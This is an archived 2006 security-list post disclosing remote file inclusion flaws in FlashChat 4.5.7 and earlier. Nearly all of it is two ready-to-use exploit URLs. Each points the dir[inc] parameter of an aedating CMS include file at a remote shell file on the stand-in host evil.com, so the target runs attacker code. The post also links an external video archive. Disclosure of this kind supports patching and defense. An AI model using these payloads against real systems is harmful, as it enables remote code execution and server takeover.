OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
FlashChat <= 4.5.7 Remote File Include Vulnerability

mc.nadzgmail.com
Date: Mon Sep 04 2006 - 10:57:19 CDT


NeXtMaN <mc.nadz [at] gmail.com>

Here are 2 RFI vulnerabilities in Flashchat i've found:

Code:
http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?

video here:

Code:
http://rapidshare.de/files/31362430/Flashchat.rar.html

# milw0rm.com [2006-09-04]